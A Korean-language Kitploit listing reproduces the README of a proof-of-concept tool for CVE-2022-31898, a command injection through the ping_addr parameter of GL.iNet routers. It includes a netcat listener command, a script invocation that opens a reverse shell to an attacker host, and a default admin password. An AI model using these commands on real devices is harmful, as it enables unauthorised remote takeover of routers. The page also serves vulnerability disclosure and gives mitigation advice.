Skip to content
KitploitKITPLOIT
도구익스플로잇블로그
Log in
제출
도구익스플로잇블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
MangoPunch-CVE-2022-31898 — 인증된 명령 주입 도구 (CVE-2022-31898) - HACKCONRD 2026. | Kitploit
도구/GitHubGitHub/cryptoghost1/mangopunch-cve-2022-31898
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and ControlRed Teaming
GitHubcryptoghost1/mangopunch-cve-2022-31898

MangoPunch-CVE-2022-31898

인증된 명령 주입 도구 (CVE-2022-31898) - HACKCONRD 2026.

저장소 보기
56개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

🥭 MangoPunch: CVE-2022-31898

GL.iNet 장치를 위한 인증된 OS 명령 주입

Python CVE Security

 __  __                         _____                 _     
|  \/  |                       |  __ \               | |    
| \  / | __ _ _ __   __ _  ___ | |__) |   _ _ __   ___| |__  
| |\/| |/ _` | '_ \ / _` |/ _ \|  ___/ | | | '_ \ / __| '_ \ 
| |  | | (_| | | | | (_| | (_) | |   | |_| | | | | (__| | | |
|_|  |_|\__,_|_| |_|\__, |\___/|_|    \__,_|_| |_|\___|_| |_|
                     __/ |                                   
                    |___/                                    

🔍 취약점 개요

이 저장소는 펌웨어 버전 3.215 미만의 GL.iNet MT300N-V2 (Mango) 및 기타 모델에서 발견된 원격 명령 실행(RCE) 취약점에 대한 기술적 개념 증명(PoC)을 포함하고 있습니다.

해당 결함은 진단 API의 ping_addr 매개변수에 존재하며, 인증된 공격자가 셸 메타문자(;)를 통해 임의 시스템 명령을 실행할 수 있게 합니다.


🚀 실행 가이드

1. 리스너 준비

공격자 머신(Kali Linux)에서 터미널을 열고 Netcat 리스너를 시작합니다:

nc -lvnp 9292

2. 익스플로잇 실행

다음 명령을 사용하여 리버스 셸을 트리거합니다:

python3 mangopunch.py -R <TARGET_IP> -L <YOUR_IP> -l <YOUR_LISTERNER_PORT> -p <PASSWORD>

🛠️ 스크립트 파라미터

플래그전체 이름설명기본값
-R--rhost원격 대상 IP (라우터)필수
-P--rport웹 관리 포트443
-L--lhost리스너 IP (Kali/공격자)필수
-l--lport리스너 포트필수
-p--pwd관리자 비밀번호goodlife
-t--httpsHTTPS 활성화False

🛡️ 해결 방안

  • 펌웨어 업데이트: 장치를 버전 3.215 이상으로 업데이트하세요.
  • 입력 검증: 개발자는 IP/호스트 이름 파라미터에 대해 엄격한 정규식 검증을 구현하고, 원시 문자열을 OS에 전달하는 셸 호출 함수를 피해야 합니다.

면책 조항: 이 도구는 교육 및 승인된 보안 테스트 목적으로만 사용됩니다. 작성자는 오용에 대해 책임을 지지 않습니다. MangoPunch: CVE-2022-31898

도구 다운로드